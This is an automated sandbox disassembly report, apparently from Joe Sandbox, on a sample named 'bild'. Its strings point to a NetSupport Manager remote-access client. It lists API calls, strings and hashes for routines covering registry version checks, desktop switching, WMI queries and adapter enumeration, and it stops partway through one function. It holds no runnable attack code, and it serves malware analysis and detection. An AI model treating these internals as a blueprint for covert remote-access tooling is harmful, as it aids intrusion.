_memset.LIBCMT ref: 1114512D

Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020

_strncpy.LIBCMT ref: 111451FA

Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52

RegCloseKey.KERNEL32(00000000), ref: 11145296

Strings

CurrentMinorVersionNumber, xrefs: 11145260
CurrentMajorVersionNumber, xrefs: 11145228
CurrentVersion, xrefs: 11145174
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 111450FB
Service Pack, xrefs: 111452DD
CSDVersion, xrefs: 1114514A

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91

Function 11026BA0 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11026C26
_strtok.LIBCMT ref: 11026C60
Sleep.KERNEL32(1102FC53,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11026D54

Strings

UseNCS, xrefs: 11026C7D
Error. not all transports loaded (%d/%d), xrefs: 11026D28
TCPIP, xrefs: 11026C82
LoadTransports(%d), xrefs: 11026C9C
Retrying..., xrefs: 11026D42
*max_sessions, xrefs: 11026CB6
Protocols, xrefs: 11026C11
Client, xrefs: 11026C16, 11026CBB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
Instruction ID: 546c7fd96e7e5c201e62e0728b24f9c1e86d1f0ab762c79c207aecf2c2ec1ca9
Opcode Fuzzy Hash: 078eda5116f2816b6dc994d4a65e88964a73d5216bb2e8940b960da01685ed19
Instruction Fuzzy Hash: A951F375E0525E9BDF11EFA9CC80BBEFBB5EB84308FA44069DC1167284E631A846C742

Function 6C5D8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C5E67B5), ref: 6C5D8D6B

Part of subcall function 6C5D4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78

GetCurrentProcessId.KERNEL32 ref: 6C5D8DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C5D8DD8
FreeLibrary.KERNEL32(?), ref: 6C5D8EBF

Part of subcall function 6C5D4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C5D4FC4
Part of subcall function 6C5D4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C5D8E0D,00000000,?,6C5D8E0D,00000000,?,00000FA0,?), ref: 6C5D4FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE

Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034

Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E

Strings

Set Is247=%d, xrefs: 6C5D8ED7
NSM247Ctl.dll, xrefs: 6C5D8E7E
CLIENT247, xrefs: 6C5D8DA7
pcictl_247.dll, xrefs: 6C5D8E6C
is247, xrefs: 6C5D8D42
NSM247, xrefs: 6C5D8D8B

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
Instruction ID: c644692432763445050495b9ad518f0df96245a93c3a5760e687270a25a5ba2d
Opcode Fuzzy Hash: 4cf3bd0c25f9ad74d08b03a31845362a29c878ce4c4754483fc4e2a54ef80a82
Instruction Fuzzy Hash: 0B41D871A00319AFDB10DB5E9C85BEA7378EB45706F0104A6EA15D6E40E770AE44CFA9

Function 11102C50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 11089280: UnhookWindowsHookEx.USER32(?), ref: 110892A3

GetCurrentThreadId.KERNEL32 ref: 11102C6C
GetThreadDesktop.USER32(00000000), ref: 11102C73
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11102C83
SetThreadDesktop.USER32(00000000), ref: 11102C90
CloseDesktop.USER32(00000000), ref: 11102CA9
GetLastError.KERNEL32 ref: 11102CB1
CloseDesktop.USER32(00000000), ref: 11102CC7
GetLastError.KERNEL32 ref: 11102CCF

Strings

SetThreadDesktop(%s) ok, xrefs: 11102C9B
SetThreadDesktop(%s) failed, e=%d, xrefs: 11102CB9
OpenDesktop(%s) failed, e=%d, xrefs: 11102CD7

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
Instruction ID: e6b285a79aa3308c0e4e86645e8e2c70f1a73097c1882eeb774c19519f5c9288
Opcode Fuzzy Hash: 6b535c7b41aace8396d526edc80c79a44f907d57885ab2fb7f21c89248cbb4d8
Instruction Fuzzy Hash: 5D11C679A042167BE7086BB15C89FBFFA2DAFC571CF051438F91786545EE24B40483B6

Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
GetLastError.KERNEL32 ref: 1115E3B5
wsprintfA.USER32 ref: 1115E3C8

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419

Strings

NSMWndClass, xrefs: 1115E3A0
GlobalAddAtom failed, e=%d, xrefs: 1115E3C2
m_aProp, xrefs: 1115E3FA
..\ctl32\wndclass.cpp, xrefs: 1115E3D9, 1115E3F5
NSMReflect, xrefs: 1115E407
NSMDropTarget, xrefs: 1115E40E

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51

Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

std::exception::exception.LIBCMT ref: 1111013A
__CxxThrowException@8.LIBCMT ref: 1111014F
GetCurrentThreadId.KERNEL32 ref: 11110166
InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F

Strings

..\ctl32\Refcount.cpp, xrefs: 111101D6
QueueThreadEvent, xrefs: 111101DB

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
Opcode Fuzzy Hash: db19f8e7b9fff8ba68d37a9baa43a0e7c0721c068b2f24d3f0a3aafd2fe6ed90
Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91

Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,F3EE1E80,00000000,?), ref: 1115BA67
CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
wsprintfW.USER32 ref: 1115BAA7
SysAllocString.OLEAUT32(?), ref: 1115BAB3
wsprintfW.USER32 ref: 1115BB67
SysFreeString.OLEAUT32(?), ref: 1115BC08

Strings

SELECT * FROM %s, xrefs: 1115BB61
root\CIMV2, xrefs: 1115BAA1
WQL, xrefs: 1115BB80

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55

Function 6C5E2F80 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 6C5E2FBB
GetTickCount.KERNEL32 ref: 6C5E300D
InterlockedExchange.KERNEL32(?,00000000), ref: 6C5E301B
_calloc.LIBCMT ref: 6C5E303B
_memmove.LIBCMT ref: 6C5E3049
InterlockedDecrement.KERNEL32(?), ref: 6C5E307F
SetEvent.KERNEL32(00000308,?,?,?,?,?,?,?,?,?,?,?,?,?,?,939E34B3), ref: 6C5E308C

Part of subcall function 6C5E28D0: wsprintfA.USER32 ref: 6C5E2965

Strings

a3^l, xrefs: 6C5E2F87, 6C5E2FEB, 6C5E3021, 6C5E2FEE, 6C5E3043, 6C5E305A, 6C5E3099
a3^l, xrefs: 6C5E2FE0, 6C5E2FE3

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
String ID: a3^l$a3^l
API String ID: 3178096747-1531287518
Opcode ID: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
Instruction ID: b07ff557ca466e130170c4e88f318dbd3eb09bff7e07ea863bff7de938e3be89
Opcode Fuzzy Hash: 3391fb66f8c9279749039ce9bdf7013c98a783aec3d5853591469d329c930f3b
Instruction Fuzzy Hash: D34166B5D00209AFDB00DFA9CC45AEFB7B8EB8C305F00851AE515E7640E771AA058BA1

Function 6C5F0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6C5F0F2B,1038AB42,00000000,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6C5F0D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6C61CB4C,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?,00000080), ref: 6C5F0D76
_malloc.LIBCMT ref: 6C5F0D8C

Part of subcall function 6C5F1B69: __FF_MSGBANNER.LIBCMT ref: 6C5F1B82
Part of subcall function 6C5F1B69: __NMSG_WRITE.LIBCMT ref: 6C5F1B89
Part of subcall function 6C5F1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C5FD3C1,6C5F6E81,00000001,6C5F6E81,?,6C5FF447,00000018,6C617738,0000000C,6C5FF4D7), ref: 6C5F1BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6C60F278,000000FF,?,6C5DAE0A,?,00000000,?), ref: 6C5F0D9F
_free.LIBCMT ref: 6C5F0D84

Part of subcall function 6C5F1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6C5F1C13
Part of subcall function 6C5F1BFD: GetLastError.KERNEL32(00000000), ref: 6C5F1C25

_free.LIBCMT ref: 6C5F0DAF

Strings

IPHLPAPI.DLL, xrefs: 6C5F0D41
GetAdaptersAddresses, xrefs: 6C5F0D55

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 1360380336-1843585929
Opcode ID: f2572543428997c8b1390d33c8aef895bc5d5504cf79b18af34aa884e991c258
Instruction ID: 5f63a6c4c531cfa2697ff8420c0a1c5ae77eb827c9b6ee89afed28c04b5278e4
Opcode Fuzzy Hash: f2572543428997c8b1390d33c8aef895bc5d5504cf79b18af34aa884e991c258
Instruction Fuzzy Hash: 0001D4F5200341ABE7289B759C85F5776A89B80B05F24482DF566CBA80EB71F846CB64

Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404

_memset.LIBCMT ref: 11145485
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
FreeLibrary.KERNEL32(00000000), ref: 111454EF
GetSystemDefaultLangID.KERNEL32 ref: 111454FA

Strings

kernel32.dll, xrefs: 111454B0
GetUserDefaultUILanguage, xrefs: 111454D1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91

Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110150CA
_memset.LIBCMT ref: 1101510E
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148

Strings

%012d, xrefs: 110150C4
PackedCatalogItem, xrefs: 11015132
NSLSP, xrefs: 11015158
